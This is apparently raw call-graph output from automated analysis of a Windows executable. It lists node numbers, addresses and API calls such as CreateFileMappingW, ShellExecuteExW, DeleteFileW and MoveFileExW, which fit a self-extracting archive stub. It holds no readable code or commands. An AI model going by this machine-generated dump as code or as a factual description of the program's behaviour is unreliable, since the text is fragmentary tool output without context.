23843->23845 23844->23840 23844->23842 23845->23844 23846->23805 23847->23813 23849 1d9e64 SetFilePointer 23848->23849 23850 1d9e53 23848->23850 23851 1d9e82 GetLastError 23849->23851 23852 1d9e9d 23849->23852 23850->23852 23880 1d6fa5 75 API calls 23850->23880 23851->23852 23854 1d9e8c 23851->23854 23852->23813 23854->23852 23881 1d6fa5 75 API calls 23854->23881 23857 1d9677 23856->23857 23862 1d9688 23856->23862 23858 1d968a 23857->23858 23859 1d9683 23857->23859 23857->23862 23887 1d96d0 23858->23887 23882 1d9817 23859->23882 23862->23709 23865 1d9c03 23863->23865 23867 1d9bfc 23863->23867 23866 1d9cc0 23865->23866 23865->23867 23869 1d9c9e 23865->23869 23902 1d984e 23865->23902 23866->23867 23870 1d984e 5 API calls 23866->23870 23867->23813 23869->23867 23914 1d6f6b 75 API calls 23869->23914 23870->23866 23871->23813 23872->23809 23873->23830 23874->23825 23875->23826 23876->23828 23877->23830 23878->23830 23879->23821 23880->23849 23881->23852 23883 1d9824 23882->23883 23884 1d9820 23882->23884 23883->23884 23893 1da12d 23883->23893 23884->23862 23888 1d96dc 23887->23888 23889 1d96fa 23887->23889 23888->23889 23891 1d96e8 CloseHandle 23888->23891 23890 1d9719 23889->23890 23901 1d6e3e 74 API calls 23889->23901 23890->23862 23891->23889 23894 1ee360 23893->23894 23895 1da13a DeleteFileW 23894->23895 23896 1da14d 23895->23896 23897 1d984c 23895->23897 23898 1db66c 2 API calls 23896->23898 23897->23862 23899 1da161 23898->23899 23899->23897 23900 1da165 DeleteFileW 23899->23900 23900->23897 23901->23890 23903 1d985c GetStdHandle 23902->23903 23904 1d9867 ReadFile 23902->23904 23903->23904 23905 1d9880 23904->23905 23910 1d98a0 23904->23910 23915 1d9989 23905->23915 23907 1d9887 23908 1d98a8 GetLastError 23907->23908 23909 1d98b7 23907->23909 23913 1d9895 23907->23913 23908->23909 23908->23910 23909->23910 23912 1d98c7 GetLastError 23909->23912 23910->23865 23911 1d984e GetFileType 23911->23910 23912->23910 23912->23913 23913->23911 23914->23867 23916 1d998f 23915->23916 23917 1d9992 GetFileType 23915->23917 23916->23907 23918 1d99a0 23917->23918 23918->23907 23920 1ee24f ___std_exception_copy 23919->23920 23921 1e8854 23920->23921 23925 1f71ad 7 API calls 2 library calls 23920->23925 23926 1eecce RaiseException Concurrency::cancel_current_task new 23920->23926 23927 1eecb1 RaiseException Concurrency::cancel_current_task 23920->23927 23921->23366 23925->23920 23929 1f7430 _abort 23928->23929 23930 1f7448 23929->23930 23931 1f757e _abort GetModuleHandleW 23929->23931 23950 1fa3f1 EnterCriticalSection 23930->23950 23933 1f743c 23931->23933 23933->23930 23962 1f75c2 GetModuleHandleExW 23933->23962 23936 1f7450 23938 1f74c5 23936->23938 23948 1f74ee 23936->23948 23970 1f7f30 20 API calls _abort 23936->23970 23945 1f81f1 _abort 5 API calls 23938->23945 23947 1f74dd 23938->23947 23939 1f750b 23954 1f753d 23939->23954 23940 1f7537 23971 201a19 5 API calls ___delayLoadHelper2@8 23940->23971 23941 1f81f1 _abort 5 API calls 23941->23948 23945->23947 23947->23941 23951 1f752e 23948->23951 23950->23936 23972 1fa441 LeaveCriticalSection 23951->23972 23953 1f7507 23953->23939 23953->23940 23973 1fa836 23954->23973 23957 1f756b 23960 1f75c2 _abort 8 API calls 23957->23960 23958 1f754b GetPEB 23958->23957 23959 1f755b GetCurrentProcess TerminateProcess 23958->23959 23959->23957 23961 1f7573 ExitProcess 23960->23961 23963 1f760f 23962->23963 23964 1f75ec GetProcAddress 23962->23964 23965 1f761e 23963->23965 23966 1f7615 FreeLibrary 23963->23966 23968 1f7601 23964->23968 23967 1eec4a ___delayLoadHelper2@8 5 API calls 23965->23967 23966->23965 23969 1f7628 23967->23969 23968->23963 23969->23930 23970->23938 23972->23953 23974 1fa85b 23973->23974 23978 1fa851 23973->23978 23975 1fa458 _abort 5 API calls 23974->23975 23975->23978 23976 1eec4a ___delayLoadHelper2@8 5 API calls 23977 1f7547 23976->23977 23977->23957 23977->23958 23978->23976 24849 1eacd0 100 API calls 24895 1e19d0 26 API calls std::bad_exception::bad_exception 24850 1ea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24852 1eeac0 27 API calls pre_c_initialization 24899 1febc1 21 API calls __vswprintf_c_l 24900 1e97c0 10 API calls 24854 1f9ec0 21 API calls 24901 1fb5c0 GetCommandLineA GetCommandLineW 24902 1fabfd 6 API calls ___delayLoadHelper2@8 23994 1ee1f9 23995 1ee203 23994->23995 23996 1edf59 ___delayLoadHelper2@8 19 API calls 23995->23996 23997 1ee210 23996->23997 24856 1f14f8 RaiseException 24903 1eebf7 20 API calls 24019 1eaee0 24020 1eaeea __EH_prolog 24019->24020 24182 1d130b 24020->24182 24023 1eaf2c 24027 1eaf39 24023->24027 24028 1eafa2 24023->24028 24088 1eaf18 24023->24088 24024 1eb5cb 24247 1ecd2e 24024->24247 24032 1eaf3e 24027->24032 24033 1eaf75 24027->24033 24031 1eb041 GetDlgItemTextW 24028->24031 24037 1eafbc 24028->24037 24029 1eb5e9 SendMessageW 24030 1eb5f7 24029->24030 24035 1eb600 SendDlgItemMessageW 24030->24035 24036 1eb611 GetDlgItem SendMessageW 24030->24036 24031->24033 24034 1eb077 24031->24034 24042 1dddd1 53 API calls 24032->24042 24032->24088 24038 1eaf96 KiUserCallbackDispatcher 24033->24038 24033->24088 24039 1eb08f GetDlgItem 24034->24039 24180 1eb080 24034->24180 24035->24036 24265 1e9da4 GetCurrentDirectoryW 24036->24265 24041 1dddd1 53 API calls 24037->24041 24038->24088 24044 1eb0a4 SendMessageW SendMessageW 24039->24044 24045 1eb0c5 SetFocus 24039->24045 24046 1eafde SetDlgItemTextW 24041->24046 24047 1eaf58 24042->24047 24043 1eb641 GetDlgItem 24048 1eb65e 24043->24048 24049 1eb664 SetWindowTextW 24043->24049 24044->24045 24050 1eb0d5 24045->24050 24062 1eb0ed 24045->24062 24051 1eafec 24046->24051 24287 1d1241 SHGetMalloc 24047->24287 24048->24049 24266 1ea2c7 GetClassNameW 24049->24266 24055 1dddd1 53 API calls 24050->24055 24061 1eaff9 GetMessageW 24051->24061 24051->24088 24053 1eb56b 24058 1dddd1 53 API calls 24053->24058 24060 1eb0df 24055->24060 24056 1eaf5f 24057 1eaf63 SetDlgItemTextW 24056->24057 24056->24088 24057->24088 24063 1eb57b SetDlgItemTextW 24058->24063 24288 1ecb5a 24060->24288 24066 1eb010 IsDialogMessageW 24061->24066 24061->24088 24070 1dddd1 53 API calls 24062->24070 24067 1eb58f 24063->24067 24066->24051 24069 1eb01f TranslateMessage DispatchMessageW 24066->24069 24072 1dddd1 53 API calls 24067->24072 24069->24051 24071 1eb124 24070->24071 24076 1d400a _swprintf 51 API calls 24071->24076 24077 1eb5b8 24072->24077 24073 1eb6af 24075 1eb6df 24073->24075 24080 1dddd1 53 API calls 24073->24080 24074 1ebdf5 98 API calls 24074->24073 24082 1eb797 24075->24082 24087 1ebdf5 98 API calls 24075->24087 24081 1eb136 24076->24081 24083 1dddd1 53 API calls 24077->24083 24078 1eb0e6 24192 1da04f 24078->24192 24085 1eb6c2 SetDlgItemTextW 24080->24085 24086 1ecb5a 16 API calls 24081->24086 24089 1eb847 24082->24089 24118 1eb825 24082->24118 24125 1dddd1 53 API calls 24082->24125 24083->24088 24093 1dddd1 53 API calls 24085->24093 24086->24078 24094 1eb6fa 24087->24094 24095 1eb859 24089->24095 24096 1eb850 EnableWindow 24089->24096 24090 1eb17f 24198 1ea322 SetCurrentDirectoryW 24090->24198 24091 1eb174 GetLastError 24091->24090 24098 1eb6d6 SetDlgItemTextW 24093->24098 24102 1eb70c 24094->24102 24110 1eb731 24094->24110 24105 1eb876 24095->24105 24306 1d12c8 GetDlgItem EnableWindow 24095->24306 24096->24095 24097 1eb195 24101 1eb19e GetLastError 24097->24101 24104 1eb1ac 24097->24104 24098->24075 24100 1eb78a 24106 1ebdf5 98 API calls 24100->24106 24101->24104 24304 1e9635 32 API calls 24102->24304 24103 1eb86c 24307 1d12c8 GetDlgItem EnableWindow 24103->24307 24111 1eb227 24104->24111 24116 1eb237 24104->24116 24117 1eb1c4 GetTickCount 24104->24117 24107 1eb89d 24105->24107 24112 1eb895 SendMessageW 24105->24112 24106->24082 24107->24088 24113 1dddd1 53 API calls 24107->24113 24110->24100 24126 1ebdf5 98 API calls 24110->24126 24115 1eb46c 24111->24115 24111->24116 24112->24107 24119 1eb8b6 SetDlgItemTextW 24113->24119 24114 1eb725 24114->24110 24207 1d12e6 GetDlgItem ShowWindow 24115->24207 24121 1eb24f GetModuleFileNameW 24116->24121 24122 1eb407 24116->24122 24123 1d400a _swprintf 51 API calls 24117->24123 24305 1e9635 32 API calls 24118->24305 24119->24088 24298 1deb3a 80 API calls 24121->24298 24122->24033 24134 1dddd1 53 API calls 24122->24134 24129 1eb1dd 24123->24129 24125->24082 24131 1eb75f 24126->24131 24127 1eb47c 24208 1d12e6 GetDlgItem ShowWindow 24127->24208 24199 1d971e 24129->24199 24130 1eb844 24130->24089 24131->24100 24135 1eb768 DialogBoxParamW 24131->24135 24133 1eb275 24137 1d400a _swprintf 51 API calls 24133->24137 24138 1eb41b 24134->24138 24135->24033 24135->24100 24136 1eb486 24139 1dddd1 53 API calls 24136->24139 24140 1eb297 CreateFileMappingW 24137->24140 24141 1d400a _swprintf 51 API calls 24138->24141 24143 1eb490 SetDlgItemTextW 24139->24143 24144 1eb2f9 GetCommandLineW 24140->24144 24176 1eb376 __vswprintf_c_l 24140->24176 24145 1eb439 24141->24145 24209 1d12e6 GetDlgItem ShowWindow 24143->24209 24151 1eb30a 24144->24151 24155 1dddd1 53 API calls 24145->24155 24146 1eb203 24147 1eb20a GetLastError 24146->24147 24148 1eb215 24146->24148 24147->24148 24153 1d9653 79 API calls 24148->24153 24149 1eb381 ShellExecuteExW 24171 1eb39e 24149->24171 24299 1eab2e SHGetMalloc 24151->24299 24153->24111 24154 1eb4a2 SetDlgItemTextW GetDlgItem 24157 1eb4bf GetWindowLongW SetWindowLongW 24154->24157 24158 1eb4d7 24154->24158 24155->24033 24156 1eb326 24300 1eab2e SHGetMalloc 24156->24300 24157->24158 24210 1ebdf5 24158->24210 24162 1eb332 24301 1eab2e SHGetMalloc 24162->24301 24163 1eb3e1 24163->24122 24170 1eb3f7 UnmapViewOfFile CloseHandle 24163->24170 24164 1ebdf5 98 API calls 24166 1eb4f3 24164->24166 24235 1ed0f5 24166->24235 24167 1eb33e 24302 1decad 80 API calls ___scrt_get_show_window_mode 24167->24302 24170->24122 24171->24163 24174 1eb3cd Sleep 24171->24174 24173 1eb355 MapViewOfFile 24173->24176 24174->24163 24174->24171 24175 1ebdf5 98 API calls 24179 1eb519 24175->24179 24176->24149 24177 1eb542 24303 1d12c8 GetDlgItem EnableWindow 24177->24303 24179->24177 24181 1ebdf5 98 API calls 24179->24181 24180->24033 24180->24053 24181->24177 24183 1d136d 24182->24183 24184 1d1314 24182->24184 24309 1dda71 GetWindowLongW SetWindowLongW 24183->24309 24185 1d137a 24184->24185 24308 1dda98 62 API calls 2 library calls 24184->24308 24185->24023 24185->24024 24185->24088 24188 1d1336 24188->24185 24189 1d1349 GetDlgItem 24188->24189 24189->24185 24190 1d1359 24189->24190 24190->24185 24191 1d135f SetWindowTextW 24190->24191 24191->24185 24194 1da059 24192->24194 24193 1da113 24193->24090 24193->24091 24194->24193 24195 1da0ea 24194->24195 24310 1da207 24194->24310 24195->24193 24196 1da207 9 API calls 24195->24196 24196->24193 24198->24097 24200 1d9728 24199->24200 24201 1d9792 CreateFileW 24200->24201 24202 1d9786 24200->24202 24201->24202 24203 1d97e4 24202->24203 24204 1db66c 2 API calls 24202->24204 24203->24146 24205 1d97cb 24204->24205 24205->24203 24206 1d97cf CreateFileW 24205->24206 24206->24203 24207->24127 24208->24136 24209->24154 24211 1ebdff __EH_prolog 24210->24211 24212 1eb4e5 24211->24212 24213 1eaa36 ExpandEnvironmentStringsW 24211->24213 24212->24164 24224 1ebe36 _wcsrchr 24213->24224 24215 1eaa36 ExpandEnvironmentStringsW 24215->24224 24216 1ec11d SetWindowTextW 24216->24224 24219 1f35de 22 API calls 24219->24224 24221 1ebf0b SetFileAttributesW 24222 1ebfc5 GetFileAttributesW 24221->24222 24229 1ebf25 ___scrt_get_show_window_mode 24221->24229 24222->24224 24226 1ebfd7 DeleteFileW 24222->24226 24224->24212 24224->24215 24224->24216 24224->24219 24224->24221 24227 1ec2e7 GetDlgItem SetWindowTextW SendMessageW 24224->24227 24232 1ec327 SendMessageW 24224->24232 24331 1e17ac CompareStringW 24224->24331 24332 1e9da4 GetCurrentDirectoryW 24224->24332 24334 1da52a 7 API calls 24224->24334 24335 1da4b3 FindClose 24224->24335 24336 1eab9a 76 API calls ___std_exception_copy 24224->24336 24226->24224 24228 1ebfe8 24226->24228 24227->24224 24230 1d400a _swprintf 51 API calls 24228->24230 24229->24222 24229->24224 24333 1db4f7 52 API calls 2 library calls 24229->24333 24231 1ec008 GetFileAttributesW 24230->24231 24231->24228 24233 1ec01d MoveFileW 24231->24233 24232->24224 24233->24224 24234 1ec035 MoveFileExW 24233->24234 24234->24224 24236 1ed0ff __EH_prolog 24235->24236 24337 1dfead 24236->24337 24238 1ed130 24341 1d5c59 24238->24341 24240 1ed14e 24345 1d7c68 24240->24345 24244 1ed1a1 24362 1d7cfb 24244->24362 24246 1eb504 24246->24175 24248 1ecd38 24247->24248 24249 1e9d1a 4 API calls 24248->24249 24250 1ecd3d 24249->24250 24251 1ecd45 GetWindow 24250->24251 24252 1eb5d1 24250->24252 24251->24252 24255 1ecd65 24251->24255 24252->24029 24252->24030 24253 1ecd72 GetClassNameW 24796 1e17ac CompareStringW 24253->24796 24255->24252 24255->24253 24256 1ecdfa GetWindow 24255->24256 24257 1ecd96 GetWindowLongW 24255->24257 24256->24252 24256->24255 24257->24256 24258 1ecda6 SendMessageW 24257->24258 24258->24256 24259 1ecdbc GetObjectW 24258->24259 24797 1e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24259->24797 24261 1ecdd3 24798 1e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24261->24798 24799 1e9f5d 8 API calls ___scrt_get_show_window_mode 24261->24799 24264 1ecde4 SendMessageW DeleteObject 24264->24256 24265->24043 24267 1ea30d 24266->24267 24268 1ea2e8 24266->24268 24270 1ea31b 24267->24270 24271 1ea312 SHAutoComplete 24267->24271 24800 1e17ac CompareStringW 24268->24800 24274 1ea7c3 24270->24274 24271->24270 24272 1ea2fb 24272->24267 24273 1ea2ff FindWindowExW 24272->24273 24273->24267 24275 1ea7cd __EH_prolog 24274->24275 24276 1d1380 82 API calls 24275->24276 24277 1ea7ef 24276->24277 24801 1d1f4f 24277->24801 24280 1ea818 24283 1d1951 126 API calls 24280->24283 24281 1ea809 24282 1d1631 84 API calls 24281->24282 24284 1ea814 24282->24284 24286 1ea83a __vswprintf_c_l ___std_exception_copy 24283->24286 24284->24073 24284->24074 24285 1d1631 84 API calls 24285->24284 24286->24284 24286->24285 24287->24056 24289 1eac74 5 API calls 24288->24289 24290 1ecb66 GetDlgItem 24289->24290 24291 1ecbbc SendMessageW SendMessageW 24290->24291 24292 1ecb88 24290->24292 24293 1ecbf8 24291->24293 24294 1ecc17 SendMessageW SendMessageW SendMessageW 24291->24294 24295 1ecb93 ShowWindow SendMessageW SendMessageW 24292->24295 24293->24294 24296 1ecc6d SendMessageW 24294->24296 24297 1ecc4a SendMessageW 24294->24297 24295->24291 24296->24078 24297->24296 24298->24133 24299->24156 24300->24162 24301->24167 24302->24173 24303->24180 24304->24114 24305->24130 24306->24103 24307->24105 24308->24188 24309->24185 24311 1da214 24310->24311 24312 1da238 24311->24312 24313 1da22b CreateDirectoryW 24311->24313 24314 1da180 4 API calls 24312->24314 24313->24312 24316 1da26b 24313->24316 24315 1da23e 24314->24315 24317 1da27e GetLastError 24315->24317 24318 1db66c 2 API calls 24315->24318 24320 1da27a 24316->24320 24323 1da444 24316->24323 24317->24320 24321 1da254 24318->24321 24320->24194 24321->24317 24322 1da258 CreateDirectoryW 24321->24322 24322->24316 24322->24317 24324 1ee360 24323->24324 24325 1da451 SetFileAttributesW 24324->24325 24326 1da494 24325->24326 24327 1da467 24325->24327 24326->24320 24328 1db66c 2 API calls 24327->24328 24329 1da47b 24328->24329 24329->24326 24330 1da47f SetFileAttributesW 24329->24330 24330->24326 24331->24224 24332->24224 24333->24229 24334->24224 24335->24224 24336->24224 24338 1dfeba 24337->24338 24366 1d1789 24338->24366 24340 1dfed2 24340->24238 24342 1dfead 24341->24342 24343 1d1789 76 API calls 24342->24343 24344 1dfed2 24343->24344 24344->24240 24346 1d7c72 __EH_prolog 24345->24346 24383 1dc827 24346->24383 24348 1d7c8d 24349 1ee24a new 8 API calls 24348->24349 24350 1d7cb7 24349->24350 24389 1e440b 24350->24389 24353 1d7ddf 24354 1d7de9 24353->24354 24355 1d7e53 24354->24355 24418 1da4c6 24354->24418 24357 1d7ec4 24355->24357 24361 1da4c6 8 API calls 24355->24361 24396 1d837f 24355->24396 24358 1d7f06 24357->24358 24424 1d6dc1 74 API calls 24357->24424 24358->24244 24361->24355 24363 1d7d09 24362->24363 24365 1d7d10 24362->24365 24364 1e1acf 84 API calls 24363->24364 24364->24365 24367 1d179f 24366->24367 24378 1d17fa __vswprintf_c_l 24366->24378 24368 1d17c8 24367->24368 24379 1d6e91 74 API calls __vswprintf_c_l 24367->24379 24369 1d1827 24368->24369 24375 1d17e7 ___std_exception_copy 24368->24375 24371 1f35de 22 API calls 24369->24371 24373 1d182e 24371->24373 24372 1d17be 24380 1d6efd 75 API calls 24372->24380 24373->24378 24382 1d6efd 75 API calls 24373->24382 24375->24378 24381 1d6efd 75 API calls 24375->24381 24378->24340 24379->24372 24380->24368 24381->24378 24382->24378 24384 1dc831 __EH_prolog 24383->24384 24385 1ee24a new 8 API calls 24384->24385 24386 1dc874 24385->24386 24387 1ee24a new 8 API calls 24386->24387 24388 1dc898 24387->24388 24388->24348 24390 1e4415 __EH_prolog 24389->24390 24391 1ee24a new 8 API calls 24390->24391 24392 1e4431 24391->24392 24393 1d7ce6 24392->24393 24395 1e06ba 78 API calls 24392->24395 24393->24353 24395->24393 24397 1d8389 __EH_prolog 24396->24397 24425 1d1380 24397->24425 24399 1d83a4 24433 1d9ef7 24399->24433 24404 1d83cf 24406 1d83d3 24404->24406 24415 1da4c6 8 API calls 24404->24415 24416 1d846e 24404->24416 24557 1dbac4 CompareStringW 24404->24557 24553 1d1631 24406->24553 24409 1d84ce 24456 1d1f00 24409->24456 24413 1d84d9 24413->24406 24460 1d3aac 24413->24460 24470 1d857b 24413->24470 24415->24404 24452 1d8517 24416->24452 24419 1da4db 24418->24419 24420 1da4df 24419->24420 24784 1da5f4 24419->24784 24420->24354 24422 1da4ef 24422->24420 24423 1da4f4 FindClose 24422->24423 24423->24420 24424->24358 24426 1d1385 __EH_prolog 24425->24426 24427 1dc827 8 API calls 24426->24427 24428 1d13bd 24427->24428 24429 1ee24a new 8 API calls 24428->24429 24432 1d1416 ___scrt_get_show_window_mode 24428->24432 24430 1d1403 24429->24430 24431 1db07d 82 API calls 24430->24431 24430->24432 24431->24432 24432->24399 24434 1d9f0e 24433->24434 24435 1d83ba 24434->24435 24559 1d6f5d 76 API calls 24434->24559 24435->24406 24437 1d19a6 24435->24437 24438 1d19b0 __EH_prolog 24437->24438 24446 1d1a00 24438->24446 24448 1d19e5 24438->24448 24560 1d709d 24438->24560 24440 1d1b50 24563 1d6dc1 74 API calls 24440->24563 24442 1d3aac 97 API calls 24447 1d1bb3 24442->24447 24443 1d1b60 24443->24442 24443->24448 24444 1d1bff 24444->24448 24450 1d1c32 24444->24450 24564 1d6dc1 74 API calls 24444->24564 24446->24440 24446->24443 24446->24448 24447->24444 24449 1d3aac 97 API calls 24447->24449 24448->24404 24449->24447 24450->24448 24451 1d3aac 97 API calls 24450->24451 24451->24450 24453 1d8524 24452->24453 24582 1e0c26 GetSystemTime SystemTimeToFileTime 24453->24582 24455 1d8488 24455->24409 24558 1e1359 72 API calls 24455->24558 24457 1d1f05 __EH_prolog 24456->24457 24459 1d1f39 24457->24459 24584 1d1951 24457->24584 24459->24413 24461 1d3abc 24460->24461 24462 1d3ab8 24460->24462 24463 1d3ae9 24461->24463 24464 1d3af7 24461->24464 24462->24413 24469 1d3b29 24463->24469 24718 1d3281 85 API calls 3 library calls 24463->24718 24719 1d27e8 97 API calls 3 library calls 24464->24719 24467 1d3af5 24467->24469 24720 1d204e 74 API calls 24467->24720 24469->24413 24471 1d8585 __EH_prolog 24470->24471 24472 1d85be 24471->24472 24480 1d85c2 24471->24480 24742 1e84bd 99 API calls 24471->24742 24473 1d85e7 24472->24473 24476 1d867a 24472->24476 24472->24480 24474 1d8609 24473->24474 24473->24480 24743 1d7b66 151 API calls 24473->24743 24474->24480 24744 1e84bd 99 API calls 24474->24744 24476->24480 24721 1d5e3a 24476->24721 24480->24413 24481 1d8705 24481->24480 24727 1d826a 24481->24727 24484 1d8875 24485 1da4c6 8 API calls 24484->24485 24486 1d88e0 24484->24486 24485->24486 24731 1d7d6c 24486->24731 24488 1dc991 80 API calls 24492 1d893b _memcmp 24488->24492 24489 1d8a70 24490 1d8b43 24489->24490 24497 1d8abf 24489->24497 24495 1d8b9e 24490->24495 24506 1d8b4e 24490->24506 24491 1d8a69 24747 1d1f94 74 API calls 24491->24747 24492->24480 24492->24488 24492->24489 24492->24491 24745 1d8236 82 API calls 24492->24745 24746 1d1f94 74 API calls 24492->24746 24504 1d8b30 24495->24504 24750 1d80ea 96 API calls 24495->24750 24496 1d8b9c 24500 1d9653 79 API calls 24496->24500 24501 1da180 4 API calls 24497->24501 24497->24504 24499 1d9653 79 API calls 24499->24480 24500->24480 24503 1d8af7 24501->24503 24502 1d8c09 24505 1d9989 GetFileType 24502->24505 24516 1d8c74 24502->24516 24552 1d91c1 __except_handler4 24502->24552 24503->24504 24748 1d9377 96 API calls 24503->24748 24504->24496 24504->24502 24510 1d8c4c 24505->24510 24506->24496 24749 1d7f26 100 API calls __except_handler4 24506->24749 24507 1daa88 8 API calls 24508 1d8cc3 24507->24508 24512 1daa88 8 API calls 24508->24512 24510->24516 24751 1d1f94 74 API calls 24510->24751 24529 1d8cd9 24512->24529 24514 1d8c62 24752 1d7061 75 API calls 24514->24752 24516->24507 24517 1d8d9c 24518 1d8efd 24517->24518 24519 1d8df7 24517->24519 24523 1d8f0f 24518->24523 24524 1d8f23 24518->24524 24540 1d8e27 24518->24540 24520 1d8e69 24519->24520 24522 1d8e07 24519->24522 24521 1d826a CharUpperW 24520->24521 24525 1d8e84 24521->24525 24526 1d8e4d 24522->24526 24532 1d8e15 24522->24532 24527 1d92e6 121 API calls 24523->24527 24528 1e2c42 75 API calls 24524->24528 24535 1d8ead 24525->24535 24536 1d8eb4 24525->24536 24525->24540 24526->24540 24755 1d7907 108 API calls 24526->24755 24527->24540 24531 1d8f3c 24528->24531 24529->24517 24753 1d9b21 SetFilePointer GetLastError SetEndOfFile 24529->24753 24758 1e28f1 121 API calls 24531->24758 24754 1d1f94 74 API calls 24532->24754 24756 1d7698 84 API calls __except_handler4 24535->24756 24757 1d9224 94 API calls __EH_prolog 24536->24757 24545 1d904b 24540->24545 24759 1d1f94 74 API calls 24540->24759 24542 1d9156 24544 1da444 4 API calls 24542->24544 24542->24552 24543 1d9104 24737 1d9d62 24543->24737 24547 1d91b1 24544->24547 24545->24542 24545->24543 24545->24552 24760 1d9ebf SetEndOfFile 24545->24760 24547->24552 24761 1d1f94 74 API calls 24547->24761 24549 1d914b 24550 1d96d0 75 API calls 24549->24550 24550->24542 24552->24499 24554 1d1643 24553->24554 24776 1dc8ca 24554->24776 24557->24404 24558->24409 24559->24435 24565 1d16d2 24560->24565 24562 1d70b9 24562->24446 24563->24448 24564->24450 24566 1d16e8 24565->24566 24577 1d1740 __vswprintf_c_l 24565->24577 24567 1d1711 24566->24567 24578 1d6e91 74 API calls __vswprintf_c_l 24566->24578 24569 1d172d ___std_exception_copy 24567->24569 24570 1d1767 24567->24570 24569->24577 24580 1d6efd 75 API calls 24569->24580 24572 1f35de 22 API calls 24570->24572 24571 1d1707 24579 1d6efd 75 API calls 24571->24579 24574 1d176e 24572->24574 24574->24577 24581 1d6efd 75 API calls 24574->24581 24577->24562 24578->24571 24579->24567 24580->24577 24581->24577 24583 1e0c56 __vswprintf_c_l 24582->24583 24583->24455 24585 1d1961 24584->24585 24587 1d195d 24584->24587 24588 1d1896 24585->24588 24587->24459 24589 1d18a8 24588->24589 24590 1d18e5 24588->24590 24591 1d3aac 97 API calls 24589->24591 24596 1d3f18 24590->24596 24593 1d18c8 24591->24593 24593->24587 24599 1d3f21 24596->24599 24597 1d3aac 97 API calls 24597->24599 24598 1d1906 24598->24593 24601 1d1e00 24598->24601 24599->24597 24599->24598 24613 1e067c 24599->24613 24602 1d1e0a __EH_prolog 24601->24602 24621 1d3b3d 24602->24621 24604 1d1e34 24605 1d1ebb 24604->24605 24606 1d16d2 76 API calls 24604->24606 24605->24593 24607 1d1e4b 24606->24607 24649 1d1849 76 API calls 24607->24649 24609 1d1e63 24611 1d1e6f 24609->24611 24650 1e137a MultiByteToWideChar 24609->24650 24651 1d1849 76 API calls 24611->24651 24614 1e0683 24613->24614 24615 1e069e 24614->24615 24619 1d6e8c RaiseException Concurrency::cancel_current_task 24614->24619 24617 1e06af SetThreadExecutionState 24615->24617 24620 1d6e8c RaiseException Concurrency::cancel_current_task 24615->24620 24617->24599 24619->24615 24620->24617 24622 1d3b47 __EH_prolog 24621->24622 24623 1d3b5d 24622->24623 24624 1d3b79 24622->24624 24680 1d6dc1 74 API calls 24623->24680 24626 1d3dc2 24624->24626 24629 1d3ba5 24624->24629 24697 1d6dc1 74 API calls 24626->24697 24628 1d3b68 24628->24604 24629->24628 24652 1e2c42 24629->24652 24631 1d3c26 24633 1d3cb1 24631->24633 24648 1d3c1d 24631->24648 24683 1dc991 24631->24683 24632 1d3c22 24632->24631 24682 1d2034 76 API calls 24632->24682 24665 1daa88 24633->24665 24635 1d3bf4 24635->24631 24635->24632 24636 1d3c12 24635->24636 24681 1d6dc1 74 API calls 24636->24681 24637 1d3cc4 24642 1d3d3e 24637->24642 24643 1d3d48 24637->24643 24669 1d92e6 24642->24669 24689 1e28f1 121 API calls 24643->24689 24646 1d3d46 24646->24648 24690 1d1f94 74 API calls 24646->24690 24691 1e1acf 24648->24691 24649->24609 24650->24611 24651->24605 24653 1e2c51 24652->24653 24655 1e2c5b 24652->24655 24698 1d6efd 75 API calls 24653->24698 24656 1e2ca2 ___std_exception_copy 24655->24656 24659 1e2c9d Concurrency::cancel_current_task 24655->24659 24664 1e2cfd ___scrt_get_show_window_mode 24655->24664 24657 1e2da9 Concurrency::cancel_current_task 24656->24657 24658 1e2cd9 24656->24658 24656->24664 24701 1f157a RaiseException 24657->24701 24699 1e2b7b 75 API calls 3 library calls 24658->24699 24700 1f157a RaiseException 24659->24700 24663 1e2dc1 24664->24635 24664->24664 24666 1daa95 24665->24666 24668 1daa9f 24665->24668 24667 1ee24a new 8 API calls 24666->24667 24667->24668 24668->24637 24670 1d92f0 __EH_prolog 24669->24670 24702 1d7dc6 24670->24702 24673 1d709d 76 API calls 24674 1d9302 24673->24674 24705 1dca6c 24674->24705 24676 1d9314 24677 1d935c 24676->24677 24679 1dca6c 114 API calls 24676->24679 24714 1dcc51 97 API calls __vswprintf_c_l 24676->24714 24677->24646 24679->24676 24680->24628 24681->24648 24682->24631 24684 1dc9c4 24683->24684 24685 1dc9b2 24683->24685 24716 1d6249 80 API calls 24684->24716 24715 1d6249 80 API calls 24685->24715 24688 1dc9bc 24688->24633 24689->24646 24690->24648 24693 1e1ad9 24691->24693 24692 1e1af2 24717 1e075b 84 API calls 24692->24717 24693->24692 24696 1e1b06 24693->24696 24695 1e1af9 24695->24696 24697->24628 24698->24655 24699->24664 24700->24657 24701->24663 24703 1dacf5 GetVersionExW 24702->24703 24704 1d7dcb 24703->24704 24704->24673 24709 1dca82 __vswprintf_c_l 24705->24709 24706 1dcbf7 24707 1dcc1f 24706->24707 24708 1dca0b 6 API calls 24706->24708 24710 1e067c SetThreadExecutionState RaiseException 24707->24710 24708->24707 24709->24706 24711 1dcbee 24709->24711 24712 1e84bd 99 API calls 24709->24712 24713 1dab70 89 API calls 24709->24713 24710->24711 24711->24676 24712->24709 24713->24709 24714->24676 24715->24688 24716->24688 24717->24695 24718->24467 24719->24467 24720->24469 24722 1d5e4a 24721->24722 24762 1d5d67 24722->24762 24724 1d5eb5 24724->24481 24726 1d5e7d 24726->24724 24767 1dad65 CharUpperW CompareStringW 24726->24767 24728 1d8289 24727->24728 24773 1e179d CharUpperW 24728->24773 24730 1d8333 24730->24484 24732 1d7d7b 24731->24732 24733 1d7dbb 24732->24733 24774 1d7043 74 API calls 24732->24774 24733->24492 24735 1d7db3 24775 1d6dc1 74 API calls 24735->24775 24738 1d9d73 24737->24738 24740 1d9d82 24737->24740 24739 1d9d79 FlushFileBuffers 24738->24739 24738->24740 24739->24740 24741 1d9dfb SetFileTime 24740->24741 24741->24549 24742->24472 24743->24474 24744->24480 24745->24492 24746->24492 24747->24489 24748->24504 24749->24496 24750->24504 24751->24514 24752->24516 24753->24517 24754->24540 24755->24540 24756->24540 24757->24540 24758->24540 24759->24545 24760->24543 24761->24552 24768 1d5c64 24762->24768 24764 1d5d88 24764->24726 24766 1d5c64 2 API calls 24766->24764 24767->24726 24771 1d5c6e 24768->24771 24769 1d5d56 24769->24764 24769->24766 24771->24769 24772 1dad65 CharUpperW CompareStringW 24771->24772 